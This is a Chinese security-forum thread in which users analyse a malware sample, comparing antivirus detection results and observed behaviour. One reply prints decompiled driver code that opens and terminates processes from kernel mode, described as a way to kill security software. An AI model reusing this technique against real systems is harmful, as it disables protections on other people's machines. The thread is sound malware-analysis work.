收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 样本 1x
123下一页
返回列表 发新帖
楼主: Yjln
 收起左侧

[病毒样本] 样本 1x

[复制链接]
莒县小哥
发表于 2024-5-17 18:16:34 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

wowocock
发表于 2024-5-17 18:19:33 | 显示全部楼层
            case 0xB4A00404:
              if ( (unsigned int)v9 >= 0x18 )
                return (unsigned int)sub_1837C(Irp->AssociatedIrp.MasterIrp);

__int64 __fastcall sub_1837C(__int64 a1)
{
  unsigned int v2; // ebx
  void *v3; // rax
  unsigned int v4; // edi
  NTSTATUS v6; // eax
  bool v7; // sf
  unsigned int v8; // ecx
  unsigned int v9; // edi
  unsigned int v10; // eax
  struct _CLIENT_ID ClientId; // [rsp+20h] [rbp-48h] BYREF
  struct _OBJECT_ATTRIBUTES ObjectAttributes; // [rsp+30h] [rbp-38h] BYREF
  void *ProcessHandle; // [rsp+78h] [rbp+10h] BYREF

  v2 = 0;
  if ( MmIsAddressValid((PVOID)a1) )
  {
    v3 = *(void **)(a1 + 4);
    v4 = 0;
    if ( !v3 )
      return 3221225485i64;
    memset(&ObjectAttributes.RootDirectory, 0, 20);
    ObjectAttributes.SecurityDescriptor = 0i64;
    ObjectAttributes.SecurityQualityOfService = 0i64;
    ClientId.UniqueThread = 0i64;
    ObjectAttributes.Length = 48;
    ClientId.UniqueProcess = v3;
    while ( 1 )
    {
      v6 = ZwOpenProcess(&ProcessHandle, 1u, &ObjectAttributes, &ClientId);
      v7 = v6 < 0;
      v2 = v6;
      if ( !v6 )
        break;
      v8 = v4++;
      if ( v8 >= 3 )
      {
        v7 = v6 < 0;
        break;
      }
    }
    if ( !v7 )
    {
      v9 = 0;
      do
      {
        v2 = ZwTerminateProcess(ProcessHandle, 0);
        if ( !v2 )
          break;
        v10 = v9++;
      }
      while ( v10 < 3 );
      ZwClose(ProcessHandle);
    }
  }
  return v2;
}
通过驱动杀进程
驱动除了360拉黑外,基本都过
https://www.virustotal.com/gui/f ... 2fff071503dcbe15856
回复

举报

Yjln
 楼主| 发表于 2024-5-17 18:20:24 | 显示全部楼层
本帖最后由 Yjln 于 2024-5-17 18:22 编辑

这能加白?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

Xopii
发表于 2024-5-17 18:25:50 | 显示全部楼层
莒县小哥 发表于 2024-5-17 18:16

我下午的时候运行之间就把安全中心禁用了,到现在扫描也不报 你是运行了吗?
回复

举报

莒县小哥
发表于 2024-5-17 18:36:19 | 显示全部楼层
Xopii 发表于 2024-5-17 18:25
我下午的时候运行之间就把安全中心禁用了,到现在扫描也不报 你是运行了吗?


没测双击 纯扫描
回复

举报

wuming_bpnes
发表于 2024-5-17 18:55:35 | 显示全部楼层
诺顿扫描miss双击报错
当然下载智能分析是直接要求删除。。
回复

举报

Yjln
 楼主| 发表于 2024-5-17 20:00:18 | 显示全部楼层
本帖最后由 Yjln 于 2024-5-17 21:35 编辑
wuming_bpnes 发表于 2024-5-17 18:55
诺顿扫描miss双击报错
当然下载智能分析是直接要求删除。。

我这能运行,衍生物都在C:\Program Files (x86)\Wegame里面,会一直删wegame-daemon.exe和wegame-service.exe
回复

举报

wuming_bpnes
发表于 2024-5-17 22:26:28 | 显示全部楼层
Yjln 发表于 2024-5-17 20:00
我这能运行,衍生物都在C:\Program Files (x86)\Wegame里面,会一直删wegame-daemon.exe和wegame-service ...

神奇,我在虚拟机里面双击直接报Error,跟7楼的框一模一样。不知道是虚拟机缺坏境还是有这玩意有虚拟机检查。
回复

举报

Yjln
 楼主| 发表于 2024-5-17 22:57:29 | 显示全部楼层
wuming_bpnes 发表于 2024-5-17 22:26
神奇,我在虚拟机里面双击直接报Error,跟7楼的框一模一样。不知道是虚拟机缺坏境还是有这玩意有虚拟机检 ...

我也虚拟机,不过我第二次双击直接自退了,动作都没有
回复

举报

biue
发表于 2024-5-17 23:14:17 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-15 15:20 , Processed in 0.092473 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表